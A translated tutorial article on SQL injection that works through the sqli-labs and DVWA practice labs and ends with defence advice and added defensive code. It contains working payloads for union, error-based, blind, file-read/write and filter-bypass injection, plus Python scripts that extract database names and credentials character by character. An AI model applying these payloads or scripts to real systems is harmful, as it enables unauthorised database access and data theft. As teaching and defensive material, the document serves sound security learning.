SLTechnology News&Howtos > Network Security, updated 2025-03-01
Shulou (Shulou.com) 06/01 report
This article covers the principles of SQL injection. Many people run into this kind of problem when working through real cases, so the editor walks you through how to handle these situations. I hope you read it carefully and come away with something!
0x01. Factors that make SQL injection possible
(1) Lack of strict validation of the input
(2) The input can maliciously modify the statement
(3) The modified statement is spliced together and executes successfully
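Added example, not part of the original article: a python demonstration of the three factors above, using an in-memory SQLite table with constructed placeholder rows. The spliced query lets an or condition in the input rewrite the statement (factors 1 to 3 together), while the parameterized query binds the same input as a plain value and returns nothing.

```python
import sqlite3

# Constructed sample data: an in-memory SQLite table standing in for the
# application's user store (placeholder values, not from any real system).
SAMPLE_USERS = [(1, "admin", "s3cret"), (2, "dumb", "dumb"), (3, "alice", "wonder")]


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def spliced_statement(username: str) -> str:
    # Factor (1): nothing checks the input. Factor (3): it is spliced straight
    # into the statement text, so a quote in the input ends the string literal.
    return f"SELECT id, username FROM users WHERE username = '{username}'"


def find_user_spliced(conn: sqlite3.Connection, username: str) -> list:
    return conn.execute(spliced_statement(username)).fetchall()


def find_user_parameterized(conn: sqlite3.Connection, username: str) -> list:
    # The statement is parsed with a placeholder and the value is bound afterwards,
    # so the input is only ever compared as data; it cannot change the query's
    # structure, which blocks factor (2), malicious modification.
    sql = "SELECT id, username FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def demo() -> dict:
    conn = build_db()
    benign = "alice"
    hostile = "x' OR '1'='1"        # constructed boolean (or) injection input
    return {
        "spliced_sql": spliced_statement(hostile),
        "spliced_benign": find_user_spliced(conn, benign),
        "spliced_hostile": find_user_spliced(conn, hostile),
        "param_benign": find_user_parameterized(conn, benign),
        "param_hostile": find_user_parameterized(conn, hostile),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The spliced form returns every row for the hostile input, because the statement the database actually parsed ends in OR '1'='1'; the parameterized form returns an empty list, because no user is literally named x' OR '1'='1.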
0x02. How to detect whether injection exists:
1. Determine whether injection exists (i.e. whether there is no strict validation) and what type of injection it is:
(1) Whether changing a controllable parameter affects what the page displays.
(2) Whether the input SQL statement can raise an error: traces of the statement can be seen in the database's error output.
(3) Whether the input SQL statement can avoid raising an error: the statement can be closed successfully.
2. Whether the statement can be maliciously modified.
3. Whether the modified statement executes successfully.
4. Whether the desired data can be obtained.
0x03. Brief description of SQL injection types
1. Boolean query
An or query: whether the field value can be found in the defined table.
2. union query
(1) Guess the number of fields (select 1,2,3... or order by 1, order by 2, order by 3...; both rely on reading the error messages).
(2) How to obtain the database name, table name and field names.
(3) The question of privileges.
3. information_schema (the database dictionary)
The information_schema database holds information about all databases on the MySQL server: database names, the tables of each database, the data types and access permissions of table columns, and so on. Put simply, which databases exist on this MySQL server, which tables each database contains, the field types of each table, the permissions needed to access each database, etc., are all stored in information_schema.
Column schema_name in information_schema.schemata records the names of all databases.
In information_schema.tables, column table_schema records the database name and column table_name records the table name, for the tables of all databases.
In information_schema.columns, column table_schema records the database name, table_name records the table name and column_name records the column name, for the columns of all tables in all databases.
Before MySQL 5.0 there is no information_schema system database, so names cannot be listed and table names can only be brute-forced.
Below 5.0 is multi-user single-operation; 5.0 and above is multi-user multi-operation.
Example: select concat(table_name) from information_schema.tables where table_schema=database()
4. Manual injection
(1) Error-based injection: judge the injection point. Single quotation marks?
(2) Boolean-based injection: close the preceding SQL statement, construct a logical expression with or / and, and comment out all subsequent statements.
(3) Union-based injection:
user(): current user name; database(): current database name; version(): database version information.
' union select 1,schema_name from information_schema.schemata -- hh   # look up the database names
' union select 1,table_name from information_schema.tables where table_schema='...' #   # list all tables in the database found above
' union select 1,column_name from information_schema.columns where table_name='...' #   # list all fields in the table found above
# concat() implements field splicing:
' union select user,concat(first_name,' ',last_name,' ',password) from users -- '   # see also group_concat() and concat_ws()
5. Error-based injection
(1) extractvalue(xml_document, Xpath_string): returns a string containing the queried value from the target XML.
(2) updatexml(xml_document, Xpath_string, new_value): the error (injection) point is the Xpath_string argument, so the other positions can be filled arbitrarily, for example with 1.
DVWA Security='low':
1' and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1) #   # 0x7e is the hexadecimal ASCII code of ~
1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='dvwa'),0x7e),1) #
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users'),0x7e),1) #
1' and updatexml(1,concat(0x7e,(select group_concat(user_id,last_name) from users),0x7e),1) #
Where:
xml_document: string format, the name of the XML document object
Xpath_string: a string in Xpath format (look it up on your own)
new_value: string format, replaces the matching data that was found
6. Double-query injection (double query error injection, two selects)
Principle: use a group by primary-key conflict to raise an error that leaks database information.
Several functions:
floor()            # round down
rand()             # returns a random value in (0,1)
rand()*2           # returns a random value in (0,2)
floor(rand()*2)    # round down, returns 0 or 1
group by           # grouping
count()            # returns the number of records in the current table
For example:
Sqli-labs Less-11 (payload)
uname=admin' union select 1,count(1) from information_schema.tables group by group_concat(floor(rand()*2),(select table_name from information_schema.tables where table_schema='security'))%23&passwd=123
7. Boolean blind injection
Used when the injection cannot directly echo error messages.
Like time-based blind injection, only one character is judged at a time.
?id=1' and substr(database(),1)=1 #
Example:
Sqli-labs Less-6
This level returns only two results: "You are in..." when the query succeeds, otherwise nothing.
?id=1' and 1-- +      echoes "You are in."
?id=1' and 1=2-- +    does not echo
In this case the substr() function can judge one character at a time, and a python script performs the Boolean blind injection, as follows:

import requests

s = requests.Session()
url = 'http://localhost:8080/sqli-labs/Less-6/'
payloads = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz[{\\|]}^~,'
data = ''
for i in range(1, 50):                      # substr() positions start at 1
    for j in payloads:
        # guess the i-th character of the current database name
        payload = f"?id=1\" and substr(binary database(),{i},1)='{j}'%23"
        # payload = f"?id=1\" and substr((select binary group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1)='{j}'%23"
        # payload = f"?id=1\" and substr((select binary group_concat(column_name) from information_schema.columns where table_name='users'),{i},1)='{j}'%23"
        # payload = f"?id=1\" and substr((select binary group_concat(password,'') from security.users),{i},1)='{j}'%23"
        if "You are in." in s.get(url + payload).text:
            data += j
            break
print(data)

8. Time-based blind injection
?id=1' union select (if(substr(database(),1,1)>1,sleep(3),1)) #
There is also the benchmark() function.
Example:
Sqli-labs Less-9
Here you can find that "You are in" is echoed regardless of whether the query is right or wrong.
Test ?id=1' and sleep(3)%23: the page is delayed by 3 seconds before echoing, so it is judged to be time-based blind injection.
Write a script for time-based blind injection, as follows:

import requests

url = 'http://localhost:8080/sqli-labs/Less-9/'
payloads = 'AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz[{\\|]}^~,'
data = ''
for i in range(1, 50):                      # substr() positions start at 1
    for j in payloads:
        # wait 1 second when the guess is correct, return immediately when it is wrong
        payload = f"?id=1' and if((substr(binary database(),{i},1)='{j}'),sleep(1),1)%23"
        # payload = f"?id=1' and if((substr((select binary group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1)='{j}'),sleep(1),1)%23"
        # payload = f"?id=1' and if((substr((select binary group_concat(column_name) from information_schema.columns where table_name='users'),{i},1)='{j}'),sleep(1),1)%23"
        try:
            r = requests.get(url + payload, timeout=1)
        except Exception:                   # the timeout fires only when sleep(1) ran, i.e. the guess was right
            data += j
            print(data)
            break

9. Cookie injection
The injection location is the Cookie of the HTTP request.
10. HTTP Referer injection
The injection location is the Referer header of the HTTP request.
11. SQL injection to read files
load_file(filename): reads the file and returns its contents as a string.
Conditions of use:
a. You must have the FILE privilege and the file must be readable
b. The file to be read must be on the database server
c. You must specify the full (absolute) path to the file
d. The size of the file to be read must be less than max_allowed_packet
Example:
?id=-1' union select 1,2,load_file("D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-1\\index.php")-- +
Write a file (into outfile):
?id=-1' union select 1,2 into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-1\\index.php"-- +
Example:
Sqli-labs Less-7
Testing finds that id=1' raises an error; commenting out the rest of the statement still raises it; after adding closing parentheses it turns out that two are needed, i.e. the parameter is wrapped as (('$id')). Then, following the hint, use outfile (the export statement).
(1) First, judge whether you have the privilege:
?id=1')) and (select count(*) from mysql.user)>0-- +
No error, so root privilege is available.
(2) So the data can be exported; export all tables:
?id=-1')) union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\result.txt"-- +
(3) Export all column names of the users table:
?id=-1')) union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users') into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\result.txt"-- +
(4) Export usernames and passwords:
?id=-1')) union select 1,2,(select group_concat(username,password) from users) into outfile "D:\\phpstudy_pro\\WWW\\sqli-labs\\Less-7\\result.txt"-- +
Note: in MySQL, pay attention to path escaping: the path separators must be written as double backslashes.
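Added example, not part of the original article: the load_file() and into outfile steps only work because the account behind the injection holds the FILE privilege (and, in the Less-7 check, can read mysql.user). The python audit below parses constructed SHOW GRANTS lines for placeholder accounts and interprets the secure_file_priv server variable; the account names, grants and paths are assumptions, and the regular expression covers the common GRANT line shape rather than every MySQL variant.

```python
import re

# Constructed SHOW GRANTS output for a few placeholder accounts (not a real server).
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    "GRANT SELECT, INSERT, UPDATE, FILE ON *.* TO 'webapp'@'%'",
    "GRANT SELECT, INSERT, UPDATE ON `security`.* TO 'app_ro'@'localhost'",
    "GRANT SELECT ON `mysql`.* TO 'reporter'@'%'",
]

GRANT_RE = re.compile(
    r"^GRANT (?P<privs>.+?) ON (?P<scope>\S+) TO (?P<user>\S+)(?P<opts>.*)$", re.IGNORECASE)

# Privileges that turn a SQL injection into file access or full server control.
DANGEROUS = {"FILE", "SUPER", "ALL PRIVILEGES", "ALL"}


def audit_grant(line: str) -> tuple:
    """Return (user, [findings]) for one SHOW GRANTS line."""
    m = GRANT_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised grant line: {line!r}")
    privs = {p.strip().upper() for p in m.group("privs").split(",")}
    scope = m.group("scope").replace("`", "")
    findings = []
    for p in sorted(privs & DANGEROUS):
        findings.append(f"{p} privilege (enables load_file()/into outfile or server control)")
    if scope == "*.*" and privs != {"USAGE"}:
        findings.append("global scope *.*: every schema, including mysql and information_schema, is reachable")
    if scope.split(".")[0].lower() == "mysql":
        findings.append("access to mysql.*: the user table is exposed")
    if "WITH GRANT OPTION" in m.group("opts").upper():
        findings.append("WITH GRANT OPTION: the account can widen its own privileges")
    return m.group("user"), findings


def audit_grants(lines) -> dict:
    """Map each account to its findings; an empty list means nothing to report."""
    return dict(audit_grant(line) for line in lines)


def classify_secure_file_priv(value) -> str:
    """Interpret the secure_file_priv variable as shown by SHOW VARIABLES."""
    if value is None or str(value).upper() == "NULL":
        return "disabled: load_file() and into outfile cannot touch the filesystem"
    if str(value) == "":
        return "unrestricted: any path the mysqld process can reach is readable/writable"
    return f"restricted: file operations only inside {value}"


if __name__ == "__main__":
    for user, findings in audit_grants(SAMPLE_GRANTS).items():
        print(user, findings or "ok")
    print(classify_secure_file_priv(""))
```

In the sample only app_ro, the account scoped to a single schema without FILE, comes back clean; that is the shape an application account should have, and with secure_file_priv set to NULL the file read/write steps above fail even if an injection exists.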
12. Bypass
(1) Bypass comment-character filtering (#, -- +)
Example: Sqli-labs Less-13
Method one (error-based injection):
?id=1' or (extractvalue(1,concat(0x7e,version()))) or '
?id=1' or (extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))) or '
Method two (close off the trailing content):
?id=' union select 1 ...
(2) Bypass and/or filtering
01. Case bypass:
Several forms of or (Or, oR, OR, ||); several forms of and (And, ..., &&)   # case variants can be used
02. Double-write bypass:
?id=1' oorrder by 1-- +
This can also be used to judge the number of echoed columns:
?id=1' union select 1,2,3 #   (slow: try one by one)
Then use error-based injection:
?id=-1' oorr extractvalue(1,concat(0x7e,database()))-- +   # (get the current database name)
or:
?id=-1' || extractvalue(1,concat(0x7e,database()))-- +
(3) Bypass space filtering: replace the space with other characters:
%09 TAB (horizontal)
%0a new line
%0b TAB (vertical)
%0c new page
%0d carriage return
%a0 space
/**/ replaces a space
?id=1' or (content) or (content)'#   # a form of injection that needs no spaces
(4) Inline comment bypass
Of the form /*!(keyword)*/
Example:
/*!select*/
(5) Special character escaping and wide-byte injection
There are three ways to escape special characters:
(1) A custom escape function:

function check_addslashes($string)
{
    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\\\", $string);   // escape any backslash
    $string = preg_replace('/\'/i', "\\\\'", $string);                          // escape single quote with a backslash
    $string = preg_replace('/\"/', "\\\\\"", $string);                          // escape double quote with a backslash
    return $string;
}

(2) Call the function addslashes()
(3) Call the function mysql_real_escape_string()
All of these methods may be bypassed by wide-byte injection.
Analysis of the principle of wide-byte injection:
Take the single quotation mark as an example: it is escaped to \'. Our goal is to get rid of the backslash that escapes it. Instead of entering ', we enter %df'. After escaping it becomes %df\', which is %df%5c%27 (%5c is the backslash \). Because the database uses the multibyte GBK encoding, %df%5c is converted into one Chinese character before the query runs, so %27, the single quotation mark, escapes from the backslash.
The difference between a wide-byte injection payload and a normal one is that %df is added before the character that will be escaped, so the escaping backslash is "eaten". It does not have to be %df: as long as (the inserted byte + %5c) forms a valid GBK character, the escaped character breaks free and the rest of the injection follows.
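Added example, not part of the original article: a python model of the wide-byte mechanism. escape_bytes() escapes raw bytes the way addslashes()-style functions do, then the result is decoded in the server's connection charset; with GBK the %df%5c pair merges into one character and the quote loses its backslash, whereas decoding first and escaping afterwards (the charset-aware approach the Solution paragraph refers to) keeps it. The inputs are constructed from Payload1 and Payload2 below; the escaping routine is a model, not PHP's or MySQL's own code.

```python
def escape_bytes(raw: bytes) -> bytes:
    """Byte-oriented escaping in the style of addslashes(): prefix ' " and \\ with a backslash.
    It never looks at the character set, which is exactly the weakness described above."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C):     # ' " \
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def quote_still_escaped(text: str) -> bool:
    """True when every single quote in the decoded statement text is preceded by a backslash."""
    return all(i > 0 and text[i - 1] == "\\" for i, ch in enumerate(text) if ch == "'")


def byte_escaping_survives(raw: bytes, charset: str) -> bool:
    """Escape on bytes first, then decode the way the server's connection charset would."""
    return quote_still_escaped(escape_bytes(raw).decode(charset, errors="replace"))


def charset_aware_escaping_survives(raw: bytes, charset: str) -> bool:
    """Decode with the connection charset first, then escape in the text domain
    (the mysql_real_escape_string + mysql_set_charset approach, modelled here)."""
    text = raw.decode(charset, errors="replace")
    escaped = text.replace("\\", "\\\\").replace("'", "\\'")
    return quote_still_escaped(escaped)


def demo() -> dict:
    plain = b"1'"            # constructed: the literal single quote, as in Payload1
    wide = b"1\xdf'"         # constructed: %df followed by the quote, as in Payload2
    return {
        "gbk_plain": byte_escaping_survives(plain, "gbk"),
        "gbk_wide": byte_escaping_survives(wide, "gbk"),            # the bypass: False
        "utf8_wide": byte_escaping_survives(wide, "utf-8"),         # no merge under UTF-8
        "gbk_wide_fixed": charset_aware_escaping_survives(wide, "gbk"),
        "merged_char_count": len(b"\xdf\x5c".decode("gbk")),        # %df%5c is one GBK character
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The model shows why the Solution paragraph insists on a consistent character set: the same bytes are harmless when the escaping layer and the database agree on the encoding, and only the mismatch lets the lead byte swallow the backslash.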
Example: Sqli-labs Less-32
Payload1: ?id=1'
You can see that the single quotation mark here has been escaped.
Payload2: ?id=1%df'
Root cause:
character_set_client (the client character set) differs from character_set_connection (the connection-layer character set), or conversion functions such as iconv and mb_convert_encoding are used improperly.
Solution:
Unify the character set used by the database, the web application and the operating system to avoid parsing differences; UTF-8 is the best choice. Or escape the data correctly, for example with mysql_real_escape_string together with mysql_set_charset.
(6) Second-order injection
(7) Filter function bypass
0x04. SQL injection defense
(1) Code layer
01. Blacklist
02. Whitelist
03. Sensitive character filtering
04. Use the framework's safe query interface
05. Standardized output
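Added example, not part of the original article: a python sketch of the whitelist item above, combined with the framework-style safe query. Column and direction names for ORDER BY cannot be bound as parameters, so they are taken from a fixed allow-list, the id is checked against a strict format, and the remaining value is bound; the table, column names and sample rows are assumptions.

```python
import re
import sqlite3

# Allow-lists: the only identifiers a request may select. Identifiers cannot be
# bound as parameters, so they must come from here, never from the request text.
ALLOWED_SORT_COLUMNS = {"id", "username", "created_at"}
ALLOWED_DIRECTIONS = {"asc", "desc"}


class ValidationError(ValueError):
    """Raised when a request value fails the whitelist or format check."""


def validate_id(value: str) -> int:
    # Positive integer of at most 10 digits: a quote, comment marker or space can never pass.
    if not re.fullmatch(r"[1-9][0-9]{0,9}", value):
        raise ValidationError(f"rejected id {value!r}")
    return int(value)


def validate_sort(column: str, direction: str) -> tuple:
    col, dire = column.lower(), direction.lower()
    if col not in ALLOWED_SORT_COLUMNS or dire not in ALLOWED_DIRECTIONS:
        raise ValidationError(f"rejected sort {column!r} {direction!r}")
    return col, dire


def build_query(id_param: str, sort_col: str, sort_dir: str) -> tuple:
    """Return (sql, params): only whitelisted identifiers reach the SQL text, the value is bound."""
    uid = validate_id(id_param)
    col, dire = validate_sort(sort_col, sort_dir)
    sql = f"SELECT id, username FROM users WHERE id >= ? ORDER BY {col} {dire}"
    return sql, (uid,)


def run(conn: sqlite3.Connection, id_param: str, sort_col: str, sort_dir: str) -> list:
    sql, params = build_query(id_param, sort_col, sort_dir)
    return conn.execute(sql, params).fetchall()


def rejected(id_param: str, sort_col: str, sort_dir: str) -> bool:
    """True when the whitelist stops the request before any SQL is built."""
    try:
        build_query(id_param, sort_col, sort_dir)
    except ValidationError:
        return True
    return False


def sample_db() -> sqlite3.Connection:
    # Constructed placeholder rows, not real data.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, created_at TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "2025-01-01"), (2, "dumb", "2025-01-02"), (3, "alice", "2025-01-03")])
    return conn


if __name__ == "__main__":
    print(run(sample_db(), "2", "username", "desc"))
    print(rejected("1' or 1=1", "id", "asc"), rejected("1", "id; drop table users", "asc"))
```

Rejecting on a strict format is the whitelist approach: instead of hunting for dangerous characters (the blacklist item), the code states what a valid value looks like and refuses everything else, which also covers the comment-character, case and double-write bypasses listed earlier without any special handling.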
(2) Configuration layer
01. Enable GPC (magic_quotes_gpc)
02. Use UTF-8
(3) Physical layer
01. WAF
02. Database audit
03. Cloud protection
04. IPS (intrusion prevention system)

01. Use secure APIs
02. Escape special characters in the input
03. Use a whitelist to standardize input validation
04. Control client input: do not allow the special characters related to SQL injection
05. The server filters, escapes, replaces or deletes special characters before submitting the SQL query to the database
This concludes the introduction to "what is the principle of SQL injection". Thank you for reading. If you want to know more about the industry, you can follow the website; the editor will publish more high-quality practical articles for you!
© 2024 shulou.com SLNews company. All rights reserved.